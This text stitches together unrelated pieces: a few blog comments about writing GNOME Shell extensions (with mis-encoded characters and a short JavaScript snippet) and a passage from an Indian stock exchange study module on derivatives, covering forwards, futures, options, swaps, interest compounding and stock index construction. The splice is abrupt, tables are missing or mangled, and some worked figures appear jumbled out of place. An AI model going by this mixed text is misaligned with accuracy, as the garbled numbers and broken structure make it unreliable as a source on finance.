éžå¸¸æœ‰ç”¨çš„ä¿¡æ¯ï¼Œthanks
very useful information, thanks
const Panel = imports.ui.panel;
function main() {
Panel.STANDARD_TRAY_ICON_SHELL_IMPLEMENTATION[‘a11y’] = ”;
}
had error: missing “init” function
Gnome-shell 3.2.1
This post does NOT cover GNOME Shell 3.2!
Wonderful article! Thanks :)
I have’t imagine that creating a shell extension would be that easy really very helpful article i have just created a welcome screen extension thank you so much , will try to do something big
It’s powerful documention please keep it update
Great info! Thanks a lot for sharing it.
Does anybody knows how can I move the message tray to the right side of the screen. I want it to be vertical. If there is a way, I may write extension. Tkanks.
Do you want to move the message tray from the bottom of the screen to the right side of the screen, is that what you are saying?
Yes that is what I want to do. When I with mouse to the right side of the screen, the message tray must show and it must show vertical. I don`t want to do it for me, but just to give me a hint how this can be done, if it is possible. Thanks Again.
I’d really like to know, where the source code for the gi-imports is located. E.g. at lines like “const Shell = imports.gi.Shell;”, where does “gi.Shell” sit?
I have downloaded Gnome’s sources with jhbuilder, but can’t find the appropriate places.
See
Enter your email address | http://blog.fpmurphy.com/2011/04/gnome-3-shell-extensions.html | CC-MAIN-2022-05 | refinedweb | 6,455 | 51.55 |
Dependency Injection: New Ground or Solid Footing?
- |
-
-
-
-
-
-
Read later
My Reading List
Andrew McVeigh has written a detailed history of dependency injection, summarized here. McVeigh is an academic that is working on architecture description languages (ADLs) as part of his Ph.D. He has also worked with Rod Johnson on a commercial product.
McVeigh writes:.McVeigh provides this definition of a software component:
A component is a unit of software that can be instantiated, and is insulated from its environment by explicitly indicating which services (via interfaces) are provided and required.McVeigh compares software components with electronic components since both should be "interchangeable, tangible units which are clear about which services they provide and which services they require." As you wire up your receiver, speakers, DVD, and your new 96" HDTV, the shape of the input and output connectors explicitly inform you which services each component requires and provides, respectively.
A Java or .Net class is not a component per se. A class can describe what it provides by means of its interfaces, but it does not declare exactly what it depends on to run. It is true that method types declare what a specific method requires, but nothing declares what is required by the class as a whole. Spring and other DI containers fill this gap by allowing class annotations or external configuration files to explicitly declare what a class requires. Configuration together with a Java class creates a software component that almost meets McVeigh's definition. Spring Bean's fall just short of McVeigh's definition of a component because for Spring the connectors are implicit - you can only set the bean property and Spring simply calls the setter.
A major feature of ADL's is the fact that the connectors are explicit. It's not just loose wire, but a cable with an HDMI connector on the end. The explicit nature of the connectors provide ADLs with interesting architecutal features, including improved testability and improved architecural tooling. In certain ADL's the connectors can be more functional. They can act like components in their own right, by performing extra functions like filtering or error handling.
Another major differentiator between ADLs and current DI technology is the notion of a Composite Component. Once you've wired all your electronics together, you have a Home Entertainment System. Yet, it isn't like Frosty the Snowman. There is no additional entity that magically appears once everything is put together just so. Your Home Entertainment System is nothing but the components and the wires that connect them.
Using McVeigh's ADL language called Backbone, you can create a new Composite Component by wiring up existing components. You can't perform this trick with Spring today since every Spring bean must be associated with a class. Despite it's power, Backbase is much easier to read than Spring XML configurations.
McVeigh narrates and interesting history of ADL. The first ADL was Conic, written in Pascal and used in distributed computing in the 1980s. Another ADL, Darwin, influenced COM. The UML specification contains an ADL that was influenced by Rational Realtime and the ROOM methodology.
Some of the future directions of dependency injection that McVeigh details include:
- The ability to swap out components at runtime.
- Evolving systems over time by capturing the change sets in ADL.
- Fractal-like composition - being able to drill into a layered system and see composite components at every level.
- GUIs - a natural fit for composite development
- Architectural design and analysis tools.
McVeighs shows us that not only is Dependency Injection here to stay, but it has a long history and an interesting future.
*Note: editted Feb 1st in response to reader comments
andrew mcveigh
Just a few minor points. My component language is Backbone, rather than Backbase. Also, the UML was influenced by ROOM and Rational Realtime rather than the other way around.
In this first article, I wasn't able to describe the key Backbone features, as I felt I needed to cover the similarities between ADLs and DI. I'll write up Backbone per se in the second article. The key point of Backbone is that it allows wiring changes for component reuse. Explicit connectors are a bit of a must for this type of facility.
Rod (Johnson) also pointed out that the new namespace features in Spring2.5 should allow me to build the composite features directly into Spring. I plan to try this out, as it sounds quite interesting.
Cheers (and thanks),
Andrew McVeigh
Cheers,
Andrew McVeigh
Re: good summary
by
Jep Castelein
Over the years we've been confused with:
-'backspace'
-'backpack', the ajax-based project manager
-'jackbase', combination of Jackbe and Backbase
And more...
Jep
Re: good summary
by
Michael Bushe
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
Michael
Re: good summary
by
andrew mcveigh
Whoops! Yes, I do a lot of work with RIAs so I mentally slipped in Backbase for Backbone. My apologies.
No worries! Backbone isn't a great name at any rate. Since the language is so close in syntax to Darwin, the neat-o name for it would be Huxley (Darwin's bulldog) which is also the name of building of the comp sci department of Imperial... I just can't be bothered to change it ;-)
Following up on your notion of convergent evolution -- when I designed Backbone, I had never seen Darwin. Bizarrely, the syntax turned out to be very, very similar and many of the concepts are identical even though Darwin is perhaps 8 years older. The same needs lead to similar solutions, I guess. In retrospect I probably took my terminology from UML which was influenced by the ADLs.
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
I wasn't planning this (although it's an interesting idea and closely linked to the discussion on XML versus language grammars). Backbone is more of a proof of concept (and interestingly the runtime for my case modelling tool). I think that writing Backbone/Spring at the level of text isn't great -- I see the text form as an means to an end. What i meant is that i would use the Spring namespace features to add simple connectors to spring. I may also add a simple form of composites. I will be doing this as part of a case study for inclusion into my phd.
Instead of using text to create these types of configurations, I use a UML2 case tool I have spent the last 3 years on. It can model these architectures in a very pleasant and intuitive way. It's called jUMbLe and all the pictures in my article are from it. It has sophisticated features for the rewiring and checking abilities I allude to in my article, which allow reuse and evolution of a component system to be modelled (the core of my phd). The plan is to generate Spring output (as well as other ADLs) from the models (hence the need to add extra expressiveness to the Spring config). At the moment, I just generate Backbone which is not as "production capable" as Spring (also less feature rich in many other areas -- e.g. no aspects).
Interestingly, my phd started with the idea of using Backbone as the plugin architecture for my case tool. My goal (soon to be reached) is that jUMbLe is able to manipulate its own component architecture! The aim is to form a very extensible componentised case tool... The working title for my thesis is "An Architectural Approach for Extensible Applications" or something like that ;-)
Here's a picture of a dummy architecture i'm modeling as an example:...
This shows the evolution of a "Stereo" component -- I have replaced a component instance with the "EnhancedMixer" component instance. This is one type of rewiring where i have disconnected the old mixer and wired in a new one as a delta change.
Another feature worth quickly mentioning is that this example shows type inferencing on the ports of Stereo. The interface types have been inferred from the internal connections of the component.
Cheers,
Andrew
Article Fixed
by
Michael Bushe
I look forward to seeing your project develop, it looks like a great tool, and especially cool if it can output Spring config.
Michael
Re: good summary
by
andrew mcveigh
Cheers,
Andrew
Last point worth re-reading...
by
Jim Leonardo
Wow... I suspect McVeigh's got an industry background? true?.
Re: Last point worth re-reading...
by
andrew mcveigh
"Finally, McVeigh laments the disconnect between academic and industry in software development."
Wow... I suspect McVeigh's got an industry background? true?
Yes, I've spent the last 18 yrs working on commercial s/w systems, although i also spent time as a speech researcher in my misspent youth (he laments on the day before his 40th birthday ;-).
True about many of the computer science formalisms, although I think there has to be give and take on both sides which happens (albeit slowly). E.g. BNF (and lots of parsing theory) is based on Chomsky grammars, a good example of how something that is once considered to be of mainly academic interest has now been accepted as a standard s/w engineering technique.
My belief is that both academia and industry need to find a healthy middle ground. Too often getting a paper published in an academic journal is about putting sophisticated spin on fairly simple ideas so that it will get published (the reviewers are often incredibly mean). Academia needs to strive for simplicity of explanation. On the other side, too often industry accepts substandard s/w simply because the market doesn't expect better either ignoring of dismissing academic results that could be applied. It's really not good enough.
At the core of s/w engineering research is completely mind-blowing stuff, which unfortunately needs to be understood to be applied: things like turing machines and complexity modeling, the pi calculus (for mobile systems), CSP for modeling concurrency and checking for deadlock etc, model checking (got 2007's turing award) for checking systems. i think (hope) that as this type of stuff becomes more accepted by s/w engineers, they will eventually be as commonplace as BNF is now.
I remain optimistic: things like automata behind regular expressions are considered old hat now, but they are also the basis of much of the theory of computer science. I sincerely hope that in time, developers will be to computing as surgeons are to medicine -- i.e. the theory and practice meet up in the same group of people.
Cheers,
Andrew
p.s. I agree with you about much of the academic papers on computer languages, though. I really struggle with these. I think they tend to be a bit ridiculous... | https://www.infoq.com/news/2008/01/dependency-injection | CC-MAIN-2017-09 | refinedweb | 1,854 | 62.48 |
Vuex is the solution for state management in Vue applications. The next version —. However, even as Vuex 4 is just getting out the door, Kia King Ishii (a Vue core team member) is talking about his plans for Vuex 5, and I’m so excited by what I saw that I had to share it with you all. Note that Vuex 5 plans are not finalized, so some things may change before Vuex 5 is released, but if it ends up mostly similar to what you see in this article, it should be a big improvement to the developer experience.
With the advent of Vue 3 and it’s composition API, people have been looking into hand-built simple alternatives. For example, demonstrates a relatively simple, yet flexible and robust pattern for using the composition API along with
provide/inject to create shared state stores. As Gábor states in his article, though, this (and other alternatives) should only be used in smaller applications because they lack all those things that aren’t directly about the code: community support, documentation, conventions, good Nuxt integrations, and developer tools.
That last one has always been one of the biggest issues for me. The Vue devtools browser extension has always been an amazing tool for debugging and developing Vue apps, and losing the Vuex inspector with “time travel” would be a pretty big loss for debugging any non-trivial applications.
Thankfully, with Vuex 5 we’ll be able to have our cake and eat it too. It will work more like these composition API alternatives but keep all the benefits of using an official state management library. Now let’s take a look at what will be changing.
Defining A Store. Actions also cannot mutate the state on their own; they must use a mutator. So what does Vuex 5 look like?
import { defineStore } from 'vuex' export const counterStore = defineStore({ name: 'counter', state() { return { count: 0 } }, getters: { double () { return this.count * 2 } }, actions: { increment () { this.count++ } } })
There are a few changes to note. This name is used by the Vuex registry, which we’ll talk about later.. Kia noted that too often, mutations just became simple setters, making them pointlessly verbose, so they removed them. He didn’t mention whether it was “ok” to mutate the state directly from outside the store, but we are definitely allowed and encouraged to mutate state directly from an action and the Flux pattern frowns on the direct mutation of state.
Note: For those who prefer the composition API over the options API for creating components, you’ll be happy to learn there is also a way to create stores in a similar fashion to using the composition API.
import { ref, computed } from 'vue' import { defineStore } from 'vuex' export const counterStore = defineStore('counter', { const count = ref(0) const double = computed(() => count.value * 2) function increment () { count.value++ } return { count, double, increment } })
As shown above, the name gets passed in as the first argument for
defineStore. The rest looks just like a composition function for components. This will yield exactly the same result as the previous example that used the options API.
Getting The Store Instantiated } } })
There are pros and cons to importing the store directly into the component and instantiating it there. It allows you to code split and lazily loads the store only where it’s needed, but now it’s a direct dependency instead of being injected by a parent (not to mention you need to import it every time you want to use it). If you want to use dependency injection to provide it throughout the app, especially if you know it’ll be used at the root of the app where code splitting won’t help, then you can just use
provide:
import { createApp } from 'vue' import { createVuex } from 'vuex' import App from './App.vue' import store from './store' const app = createApp(App) const vuex = createVuex() app.use(vuex) app.provide('store', store) // provide the store to all components app.mount('#app')
And you can just inject it in any component where you’re going to use it:
import { defineComponent } from 'vue' export default defineComponent({ name: 'App', inject: ['store'] }) // Or with Composition API import { defineComponent, inject } from 'vue' export default defineComponent({ setup () { const store = inject('store') return { store } } })
I’m not excited about this extra verbosity, but it is more explicit and more flexible, which I am a fan of. This type of code is generally written once right away at the beginning of the project and then it doesn’t bother you again, though now you’ll either need to provide each new store or import it every time you wish to use it, but importing or injecting code modules is how we generally have to work with anything else, so it’s just making Vuex work more along the lines of how people already tend to work.
Using A Store
Apart from being a fan of the flexibility and the new way of defining stores the same way as a component using the composition API, there’s one more thing that makes me more excited than everything else: how stores are used.. And this API only gets more difficult to use when you are using namespaced modules. By comparison, Vuex 5 looks to work exactly how you would normally hope:
store.count // Access State store.double // Access Getters (transparent) store.increment() // Run actions // No Mutators
Everything — the state, getters and actions — is available directly at the root of the store, making it simple to use with a lot less verbosity and practically removes all need for using
mapState,
mapGetters,
mapActions and
mapMutations for the options API or for writing statements or simple functions for composition API. This simply makes a Vuex store look and act just like a normal store that you would build yourself, but it gets all the benefits of plugins, debugging tools, official documentation, etc.
Composing Stores
The final aspect of Vuex 5 we’ll look at today is composability. Vuex 5 doesn’t have namespaced modules that are all accessible from the single store. Each of those modules would be split into a completely separate store. That’s simple enough to deal with for components: they just import whichever stores they need and fire them up and use them. But what if one store wants to interact with another
usethe store use () { return { greeter: greeterStore } }, state () { return { count: 0 } }, getters: { greetingCount () { return `${this.greeter.greeting} ${this.count}' // access it from this.greeter } } })
With v5, we import the store we wish to use, then register it with
use and now it’s accessible all over the store at whatever property name you gave it. Things are even simpler if you’re using the composition API variation of the store definition:
// store/counter.js import { ref, computed } from 'vue' import { defineStore } from 'vuex' import greeterStore from './greeter' // Import the store you want to interact with export default defineStore('counter', ({use}) => { //
useis passed in to function const greeter = use(greeterStore) // use
useand now you have full access const count = 0 const greetingCount = computed(() => { return
${greeter.greeting} ${this.count}// access it like any other variable }) return { count, greetingCount } })
No more namespaced modules. Each store is separate and is used separately. You can use
use to make a store available inside another store to compose them. In both examples,
use is basically just the same mechanism as
vuex.store from earlier and they ensure that we instantiating the stores with the correct instance of Vuex.
TypeScript Support
For TypeScript users, one of the greatest aspects of Vuex 5 is that the simplification made it simpler to add types to everything. The layers of abstraction that older versions of Vuex had made it nearly impossible and right now, with Vuex 4, they increased our ability to use types, but there is still too much manual work to get a decent amount of type support, whereas in v5, you can put your types inline, just as you would hope and expect.
Conclusion
Vuex 5 looks to be almost exactly what I — and likely many others — hoped it would be, and I feel it can’t come soon enough. It simplifies most of Vuex, removing some of the mental overhead involved, and only gets more complicated or verbose where it adds flexibility. Leave comments below about what you think of these changes and what changes you might make instead or in addition. Or go straight to the source and add an RFC (Request for Comments) to the list to see what the core team thinks. | https://kerbco.com/whats-coming-to-vuex/ | CC-MAIN-2022-05 | refinedweb | 1,429 | 57.81 |
Are you sure?
This
Mumbai 400 051 INDIA All content included in this book.nseindia. Furthermore. the book in its entirety or any part cannot be stored in a retrieval system or transmitted in any form or by any means. Mechanism and Pricing Application of Futures Contracts Options Contracts. (NSE) Exchange Plaza. reproduced. mechanical. graphics.Candidates are advised to refer to NSE’s website: www. sold. Bandra (East). recording or otherwise. Copyright © 2011 by National Stock Exchange of India Ltd. data compilation etc.Distribution of weights of the Derivatives Market (Dealers) Module Curriculum Chapter No 1 2 3 4 5 6 7 8 9 10 Title Introduction to Derivatives Understanding Interest Rates and Stock Indices Futures Contracts. Bandra Kurla Complex. logos. if any. 5 . such as text. resold or exploited for any commercial purposes. duplicated. electronic. Mechanism and Applications Pricing of Options Contracts and Greek Letters Trading of Derivatives Contracts Clearing and Settlement Regulatory Framework Accounting for Derivatives Weights (%) 5 5 5 10 10 10 20 20 10 5 Note:. are the property of NSE. photocopying. images.com while preparing for NCFM test (s) for announcements pertaining to revisions/updations in NCFM modules or launch of new modules. This book or any part thereof should not be copied.
1 Forward Contracts: These are promises to deliver an asset at a pre. of underlying securities. 1. share. (ii) a contract which derives its value from the prices. These are basically exchange traded. The buyers of futures contracts are considered having a long position whereas the sellers are considered to be having a short position. an interest bearing security or a physical commodity. 1.2 Futures Contracts: A futures contract is an agreement between two parties to buy or sell an asset at a certain time in future at a certain price. temperature and even volatility.3 Options Contracts: Options give the buyer (holder) a right but not an obligation to buy or sell an asset in future.CHAPTER 1: Introduction to Derivatives The term ‘Derivative’ stands for a contract whose price is derived from or is dependent upon an underlying asset. It should be noted that this is similar to any asset market where anybody who buys is long and the one who sells in short. 1. (1956) the term “derivative” includes: (i) a security derived from a debt instrument. The contracts are traded over the counter (i. Forwards are highly popular on currencies and interest rates. Futures contracts are available on variety of commodities. the risk that one of the parties to the contract may not fulfill his or her obligation. directly between the two parties) and are customized according to the needs of the parties.e. The exchange stands guarantee to all transactions and counterparty risk is largely eliminated.1 Types of Derivative Contracts Derivatives comprise four basic contracts namely Forwards. standardized contracts. around the world. stock and market index. Options and Swaps. They are highly popular on stock indices.1.1. Calls give the buyer the right but not the obligation to buy a given quantity of the underlying asset. currencies. or index of prices. The underlying asset could be a financial asset such as currency. they generally suffer from counterparty risk i. Futures. weather. Let us briefly define some of the contracts 1. interest rates and foreign exchange. at a given price on 6 . According to the Securities Contract Regulation Act.determined date in future at a predetermined price. risk instrument or contract for differences or any other form of security.1. whether secured or unsecured. stocks and other tradable assets. Over the past couple of decades several exotic contracts have also emerged but these are largely the variants of these basic contracts. Since these contracts do not fall under the purview of rules and regulations of an exchange. outside the stock exchanges. loan. interest rates.calls and puts.e. derivative contracts are traded on electricity. Today. Options are of two types .
whereas privately negotiated derivative contracts are called OTC contracts. or margining. The OTC derivatives markets have the following features compared to exchange-traded derivatives: (i) The management of counter-party (credit) risk is decentralized and located within individual institutions. and for safeguarding the collective interests of market participants. affected indirectly by national legal systems. in the first two types of derivative contracts (forwards and futures) both the parties (buyer and seller) have an obligation. (ii) There are no formal centralized limits on individual positions.1. One can buy and sell each of the contracts. and (iv) The OTC contracts are generally not regulated by a regulatory authority and the exchange’s self-regulatory organization. i. the buyer needs to pay for the asset to the seller and the seller needs to deliver the asset to the buyer on the settlement date. Incase the buyer of the option does exercise his right. 1. banking supervision and market surveillance. the seller of the option must fulfill whatever is his obligation (for a call option the seller has to deliver the asset to the buyer of the option and for a put option the seller has to receive the asset from the buyer of the option). (iv) There are no formal rules or mechanisms for ensuring market stability and integrity. In case of options only the seller (also called option writer) is under an obligation and not the buyer (also called option purchaser). leverage.1: Over the Counter (OTC) Derivative Contracts Derivatives that trade on an exchange are called exchange traded derivatives. • Currency swaps: These entail swapping both principal and interest between the parties. The buyer has a right to buy (call options) or sell (put options) the asset from / to the seller of the option but he may or may not exercise this right.e. with the cash flows in one direction being in a different currency than those in the opposite direction. They are however. An option can be exercised at the expiry of the contract period (which is known as European option contract) or anytime up to the expiry of the contract period (termed as American option contract). (iii) There are no formal rules for risk and burden-sharing. but not the obligation to sell a given quantity of the underlying asset at a given price on or before a given date. When one buys an option he is said to be having a long position and when one sells he is said to be having a short position. They can be regarded as portfolios of forward contracts.4 Swaps: Swaps are private agreements between two parties to exchange cash flows in the future according to a prearranged formula.or before a given future date. We will discuss option contracts in detail in chapters 5 and 6. Box 1. The two commonly used swaps are: • Interest rate swaps: These entail swapping only the interest related cash flows between the parties in the same currency. Puts give the buyer the right. It should be noted that. 7 .
the Chicago Board of Trade (CBOT) created the Chicago Board Options Exchange (CBOE) to facilitate the trade of options on selected stocks. Currently the most popular stock index futures contract in the world is based on S&P 500 index. The first stock index futures contract was traded at Kansas City Board of Trade. however remained a serious problem. The primary intention of the CBOT was to provide a centralized location (which would be known in advance) for buyers and sellers to negotiate forward contracts. futures on T-bills and EuroDollar futures are the three most popular futures contracts traded today. During the mid eighties. The first exchange-traded financial derivatives emerged in 1970’s due to the collapse of fixed exchange rate system and adoption of floating exchange rate systems. To help participants in foreign exchange markets hedge their risks under the new floating exchange rate system. indeed the two largest “financial” exchanges of any kind in the world today. Eurex etc. SGX in Singapore. Index futures. In 1865. DTB in Germany. To deal with this problem. TIFFE in Japan. foreign currency futures were introduced in 1972 at the Chicago Mercantile Exchange. In 1919. financial futures became the most active derivative instruments generating volumes many times more than the commodity futures. MATIF in France. The CBOT and the CME remain the two largest organized futures exchanges. Globalization of financial markets has forced several countries to change laws and introduce innovative financial contracts which have made it easier for the participants to undertake derivatives transactions. 8 . a group of Chicago businessmen formed the Chicago Board of Trade (CBOT) in 1848. a spin-off of CBOT. ‘Credit risk’. traded on Chicago Mercantile Exchange. As the system broke down currency volatility became a crucial problem for most countries. These contracts were called ‘futures contracts”. was reorganized to allow futures trading. A rapid change in technology has increased the processing power of computers and has made them a key vehicle for information processing in financial markets. In 1973.1.2 History of Financial Derivatives Markets Financial derivatives have emerged as one of the biggest markets of the world during the past two decades. the CBOT went one step further and listed the first ‘exchange traded” derivatives contract in the US. Other popular international exchanges that trade derivatives are LIFFE in England. Early forward contracts in the US addressed merchants’ concerns about ensuring that there were buyers and sellers for commodities. Its name was changed to Chicago Mercantile Exchange (CME). Chicago Butter and Egg Board.
1 gives a bird’s eye view of these contracts as available worldwide on several exchanges. 2001 and July 2. Afterwards a large number of innovative products have been introduced in both exchange traded format and the Over the Counter (OTC) format. 2001. Single stock futures were launched on November 9. Table 1. 2000 with futures trading on S&P CNX Nifty Index. Bank Nifty Index. floors & collars. Subsequent trading in index options and options on individual securities commenced on June 4. Futures contracts on interest-bearing government securities were introduced in mid-1970s. The derivatives contracts have a maximum of 3-month expiration cycles except for a long dated Nifty Options contract which has a maturity of 5 years. Three contracts are available for trading. A new contract is introduced on the next trading day following the expiry of the near month contract. with 1 month. Ever since the product base has increased to include trading in futures and options on CNX IT Index. The OTC derivatives have grown faster than the exchange-traded contracts in the recent years. 2001. both in terms of volume and turnover. Nifty Midcap 50 Indices etc.Box 1. NSE is the largest derivatives exchange in India. Today.2: History of Derivative Trading at NSE The derivatives trading on the NSE commenced on June 12 . Table 1.
In this section. Margining. are linked to the underlying cash markets. With the introduction of derivatives. Thus derivatives help in discovery of future as well as current prices. • Prices in an organized derivatives market reflect the perception of the market participants about the future and lead the prices of underlying to the perceived future level.. due to their inherent nature. The prices of derivatives converge with the prices of the underlying at the expiration of the derivative contract. In the absence of an organized derivatives market. 10 . we discuss some of them. This is because of participation by more players who would not otherwise participate for lack of an arrangement to transfer risk. • Arbitrageurs: They take positions in financial markets to earn riskless profits. • Speculative trades shift to a more controlled environment in derivatives market. 1. Hedgers use the derivatives markets primarily for price risk management of assets and portfolios. the underlying market witnesses higher trading volumes. speculators trade in the underlying cash markets.4 Economic Function of the Derivative Market The derivatives market performs a number of economic functions. The arbitrageurs take short and long positions in the same or different contracts at the same time to create a position which can generate a riskless profit. Several new and innovative contracts have been launched over the past decade around the world including option contracts on volatility indices. • Derivatives. monitoring and surveillance of the activities of various participants become extremely difficult in these kind of mixed markets. • The derivatives market helps to transfer risks from those who have them but do not like them to those who have an appetite for them. 1.3 Participants in a Derivative Market The derivatives market is similar to any other financial market and has following three broad categories of participants: • Hedgers: These are investors with a present or anticipated exposure to the underlying asset which is subject to price risks.The above list is not exhaustive.
well-educated people with an entrepreneurial attitude. creative. They often energize others to create new businesses. In a nut shell.• An important incidental benefit that flows from derivatives trading is that it acts as a catalyst for new entrepreneurial activity. derivatives markets help increase savings and investment in the long run. Transfer of risk enables market participants to expand their volume of activity. 11 . The derivatives have a history of attracting many bright. new products and new employment opportunities. the benefit of which are immense.
For example the statement that interest rate on a given deposit is equal to 10% per annum implies that the deposit provides an interest rate of 10% on an annually compounded basis (using the formula A=P(1+r/t)t ) where P is the principal.471 110. if the compounding frequency is changed to semi annual and the rate of interest on Rs. returns on assets change continuously and lead to the fact that continuous compounding should be used.000 110. We will also learn about derivative contracts on indices which have the index as underlying. 110. The continuous compounding is done 12 . if Rs 100 is deposited in a fixed deposit it would give a return of Rs 100(1+0. Thus. For instance.381 110. from annual to daily and finally continuous compounding.100 is 10% then the amount on maturity would be Rs. However.250 110. Table 2.516 110. r is the rate of interest and t is the time. they also indicate the frequency along with the per annum rates. However the final amount will be different if the compounding frequency changes.e.1 Understanding Interest rates The interest rates can be discrete or continuous.517 It should be noted that daily compounding is the new norm for calculating savings accounts balances by banks in India (starting from April 1. The table 2.1)(1)] Amount in one year (Rs) 110. 2.CHAPTER 2: Understanding Interest Rates and Stock Indices In this chapter we will discuss the interest rates and market index related issues. On the other hand a fixed deposit is discretely compounded and the frequency could be from annual to quarterly to daily.250.1 below shows the change in amount when the same interest rate is compounded more frequently i. The interest rates are always quoted on per annum basis. since it will help better understand the functioning of derivatives markets. 2010). When people invest in financial markets (such as equity shares).1) = Rs 110.
1 What is the equivalent rate for continuous compounding for an interest rate which is quoted: (a) (b) 8% per annum semi annual compounding? 8% per annum annual compounding? 2ln(1+0. Stock market indices are meant to capture the overall behavior of equity markets. Some uses of them are: 1.07696=7. 1995.38% Solution: (a) (b) Part (b) of Illustration 2. The beginning value or base of the index is usually set to a number such as 100 or 1000. What is the equivalent rate when it is: (a) (b) Continuous compounding Annual compounding. More specifically. e is exponential function which is equal to 2.08) =0. 2. As a benchmark for portfolio performance. As an underlying in derivative instruments like Index futures.2 is also called effective annual rate calculation. A stock market index is created by selecting a group of stocks that are representative of the entire market or a specified sector or segment of the market.098770=9. and In passive fund management by index funds/ETFs 13 . the base value of the Nifty was set to 1000 on the start date of November 3. 3. By this method any given interest rate or return can be converted to its effective annual interest rate or effective annual return.10/4)=0. 4ln (1+0. 4.2 Understanding the Stock Index An index is a number which measures the change in a set of values over a period of time.2 A bank quotes you an interest rate of 10% per annum with quarterly compounding. As a barometer for market behaviour. a stock index number is the current relative value of a weighted average of the prices of a pre-defined group of equities. Index options.by multiplying the principal with ert where r is the rate of interest and t the time period.877% [(1+0.10/4)4]-1= 10. Illustration 2.696% Solution: (a) (b) Illustration 2. A stock index represents the change in value of a set of stocks which constitute the index.844% ln(1+. Stock market indices are useful for a variety of reasons.08/2)=0. It is calculated with reference to a base period and a base index value. For example. 2.718.078441=7.
other factors common to all companies in a country) The index captures the second part. The more serious problem lies in the stocks which are included into an index when it is broadened. News about the economy – macro economic factors (e.e. diminishing returns to diversification. If the stock is illiquid. Going from 50 stocks to 100 stocks gives very little reduction in risk. or the closure of a factory. There are however. News about the company.3 Economic Significance of Index Movements Index movements reflect the changing expectations of the stock market about future dividends of the corporate sector. changes in tax structure and rates.3000 crore. A well diversified index is more representative of the market/economy. The index goes up if the stock market perceives that the prospective dividends in the future will be better than previously thought.stock news and index news. there is little to gain by diversifying beyond a point. other factors specific to a company) 2. political news such as change of national government. (b) Market Capitalization Weighted index and the (c) Price Weighted Index. Every stock price moves for two possible reasons: 1. The ideal index gives us instant picture about how the stock market perceives the future of corporate sector. Each stock contains a mixture of two elements . a product launch. The news that is common to all stocks is news about the economy.micro economic factors (e.g. A has a market capitalization of Rs. The correct method of averaging is that of taking a weighted average. When the prospects of dividends in the future become pessimistic. Going from 10 stocks to 20 stocks gives a sharp reduction in risk. giving each stock a weight proportional to its market capitalization.4 Index Construction Issues A good index is a trade-off between diversification and liquidity. for each company in the index is determined based on the public shareholding of the 14 . Then we attach a weight of 1/4 to movements in A and 3/4 to movements in B. news about the macroeconomic factors related to entire economy). budget announcements. 2. Free Float Market Capitalisation Weighted Index: The free float factor (Investible Weight Factor). the individual stock news tends to cancel out and the only thing left is news that is common to all stocks. Hence. the observed prices yield contaminated information and actually worsen an index. the index drops. The computational methodology followed for construction of stock market indices are (a) Free Float Market Capitalization Weighted Index. Example: Suppose an index contains two stocks.g. Going beyond 100 stocks gives almost zero reduction in risk.2. When we take an average of returns on many stocks. the movements of the stock market as a whole (i. This is achieved by averaging. A and B.1000 crore and B has a market capitalization of Rs.
The Free float market capitalization is calculated in the following manner: Free Float Market Capitalisation = Issue Size * Price * Investible Weight Factor The Index in this case is calculated as per the formulae given below: The India Index Services Limited (IISL). Current market capitalization = Sum of (current market price * Issue size) of all securities in the index.5 Desirable Attributes of an Index A good market index should have three attributes: • • • It should capture the behaviour of a large variety of different portfolios in the market.. Market Capitalisation Weighted Index: In this type of index calculation. CNX 100 and S&P CNX Defty are being calculated using free float market capitalisation. (ii) Shares held by promoters through ADRs/GDRs. It should be professionally maintained. 2. will have a greater influence over the performance of the index. The value of the index is generated by adding the prices of each of the stocks in the index and dividing then by the total number of stocks. (iv) Investments under FDI Category. introduced the free float market capitalization methodology for its main four indices. Similarly. CNX Nifty Junior and CNX 100. (iii) Strategic stakes by corporate bodies/Individuals /HUF. each stock in the index affects the index value in proportion to the market value of all shares outstanding. S&P CNX Nifty. S&P CNX Nifty. a joint venture between the NSE and CRISIL. The stocks included in the index should be highly liquid. 2009 CNX Nifty Junior and with effect from June 26. With effect from May 4. viz. therefore. In this the index would be calculated as per the formulae below: Where. Stocks with a higher price will be given more weight and. 2009. Base market capitalization = Sum of (market price * issue size) of all securities as on base date. (V) Equity held by associate /group companies 15 . S&P CNX Defty. 1 The free float method excludes (i) Government holding in the capacity of strategic investor. in a price weighted index each stock influences the index in proportion to its price per share.companies as disclosed in the shareholding pattern submitted to the stock exchange by these companies1 .
suppose a buy order for 1000 shares goes through at Rs.e. index options and index funds. i. a buy order goes through at 2001.102. Now.0005) and a sell order gets 1999.104. It was designed not only as a barometer of market movement but also to be a foundation of the new world of financial products based on the index like index futures. (c) the largest 50 stocks that meet the criterion go into the index. Box 2.50% when doing S&P CNX Nifty trades of two crore rupees.In brief the level of diversification of a stock index should be monitored on a continuous basis. Suppose a stock trades at bid 99 and ask 101. The S&P CNX Nifty covers 21 sectors of the Indian economy and offers investment managers exposure to the Indian market in one efficient portfolio. It reflects the costs faced when actually trading an index. For a stock to qualify for possible inclusion into the S&P CNX Nifty.1 Impact cost Market impact cost is a measure of the liquidity of the market.5. It is used for a variety of purposes. We say the “ideal” price is Rs. Then we say the market impact cost at 1000 shares is 2%. 2. describes how S&P CNX Nifty addresses these issues.0005). 2000-(2000*0. 2000+(2000*0. Box 2.1 16 . A trillion calculations were expended to evolve the rules inside the S&P CNX Nifty index.1: The S&P CNX Nifty The S&P CNX Nifty is a float-adjusted market capitalization weighted index derived from economic research. (b) stocks considered for the S&P CNX Nifty must be liquid by the ‘impact cost’ criterion. i. 100. This means that if S&P CNX Nifty is at 2000. It should ensure that the index is not vulnerable to speculation. Stocks with low trading volume or with very tight bid ask spreads are illiquid and should not be a part of index. The Nifty is uniquely equipped as an index for the index derivatives market owing to its (a) low market impact cost and (b) high hedging effectiveness. The results of this work are remarkably simple: (a) the correct size to use is 50. The good diversification of Nifty generates low initial margin requirement. The index should be managed smoothly without any dramatic changes in its composition. it has to have market impact cost of below 0. The research that led up to S&P CNX Nifty is well-respected internationally as a pioneering effort in better understanding how to make a stock market index. If a buy order for 2000 shares goes through at Rs. we say the market impact cost at 2000 shares is 4%. such as benchmarking fund portfolios.e. index based derivatives and index funds.
